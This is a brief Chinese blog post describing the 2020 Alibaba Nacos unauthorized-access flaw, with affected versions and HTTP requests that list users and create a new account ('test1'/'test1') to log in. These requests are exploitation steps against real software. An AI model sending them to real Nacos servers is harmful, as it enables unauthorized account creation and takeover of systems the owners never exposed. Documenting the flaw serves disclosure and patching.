漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作
影响版本:
Nacos <= 2.0.0-ALPHA.1
漏洞地址:GET http://IP:端口/nacos/v1/auth/users?pageNo=1&pageSize=9
利用方式:POST http://IP:端口/nacos/v1/auth/users?username=test1&password=test1
加账户密码登录
标签:test1,http,IP,nacos,Nacos,漏洞,授权 From: https://www.cnblogs.com/websec80/p/18096100